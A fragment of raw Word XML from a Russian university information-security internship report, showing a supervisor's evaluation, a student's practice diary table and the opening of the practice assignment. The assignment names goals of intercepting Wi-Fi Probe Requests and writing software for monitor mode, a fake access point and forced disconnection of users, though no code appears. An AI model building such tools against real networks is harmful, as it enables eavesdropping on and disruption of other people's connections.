          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>А.О.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> полностью выполнил предусмотренную программу практики, продемонстрировал умения самостоятельно решать практические вопросы, применяя теоретическую базу, полученную в учебный период, а также при самостоятельном обучении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3AE8C2" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing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выполнении поставленных задач Мельников </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>А.О.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> характеризуется инициативностью, сообразительностью и ответственностью.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4500379D" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34625369" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B26A0A9" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53EE521A" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB333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Старший преподаватель кафедры                                       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0A00F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB333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информационной безопасности</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_________    Зотов </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С.С.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="76995FE0" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:ind w:firstLine="567"/>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74FFFB19" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ДНЕВНИК СТУДЕНТА</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B50EF7C" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:smallCaps/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10231"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1928"/>
        <w:gridCol w:w="4900"/>
        <w:gridCol w:w="2161"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CB3331" w14:paraId="21E93076" w14:textId="77777777" w:rsidTr="007860B2">
        <w:trPr>
          <w:trHeight w:val="587"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B003633" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="222C0750" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860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Рабочее место</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4900" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E21582A" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860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Краткое содержание выполняемых работ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2161" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="303FFD67" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860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Отметки руководителя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="246DAE5B" w14:textId="77777777" w:rsidTr="007860B2">
        <w:trPr>
          <w:trHeight w:val="598"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09F4E2C1" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860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22.02.21 – 15.03.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12ABCF52" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860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КИБ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4900" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="643D4205" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="cente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 xml:space="preserve">Подготовка оборудования для работы </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2161" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D1AB3BA" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="2AE43D47" w14:textId="77777777" w:rsidTr="007860B2">
        <w:trPr>
          <w:trHeight w:val="598"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC68CFC" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>16.03.21 – 27.04.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="421B74AA" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="325784C9" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>КИБ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4900" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="628DE37E" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860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Поиск теоретического материала</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2161" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="785D35C2" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="4046260E" w14:textId="77777777" w:rsidTr="007860B2">
        <w:trPr>
          <w:trHeight w:val="587"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="110F928E" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>28.04.21 – 24.05.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D76092F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="544B215F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>КИБ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="614C166C" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860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программного обеспечения </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2161" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F051011" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="6BA93BA2" w14:textId="77777777" w:rsidTr="007860B2">
        <w:trPr>
          <w:trHeight w:val="598"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E2EC4AB" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>25.05.21 – 14.06.21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="433BCF4E" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>КИБ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="688CAE7D" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860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Разработка программного обеспечения </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2161" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="780ED25D" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="220AE188" w14:textId="77777777" w:rsidTr="007860B2">
        <w:trPr>
          <w:trHeight w:val="587"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5661ADD0" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B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15.06.21 – 26.06.21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C55D70E" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="042833C5" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1556AD76" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>КИБ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4900" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="394957BE" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:highlight w:val="red"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Написание отчёта по проделанной работе</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2161" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DB7DFA0" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="167AE12C" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031D0265" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF19305" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A1CE61" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A774C7A" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DBDA895" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB333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Студент _______________________________________ Мельников </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>А.О.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0FF921D1" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">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подпись Ф.И.О.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6392FF8D" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB333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практики от ДВФУ _________________Зотов </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С.С.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1962C002" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">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подпись Ф.И.О.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6CC2E5" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737DD7E7" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD0BDEB" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C12A3BC" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_heading=h.6yni3ostti4x" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42202216" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_heading=h.rd60k5cnyxl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="2" w:name="_Toc75213383"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Задание на практику</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="65C88812" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">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Изучение основ беспроводной передачи данных, используемых в современном оборудовании и вычислительной техники;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591911D3" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">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Приобретение практических навыков в настройке оборудования, необходимого для сбора и последующей обработки полученных данных при перехвате Wi-Fi Probe Request запросов;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CDAC16" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">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Реализация программного обеспечения, позволяющего управлять режимами работы сетевого адаптера устройства для переключения между режимами прослушивания, ложной точки доступа и принудительного отключения пользователя от сети;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4F9911" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="12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Написание отчета о проделанной работе по вышеуказанной теме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAFE92F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
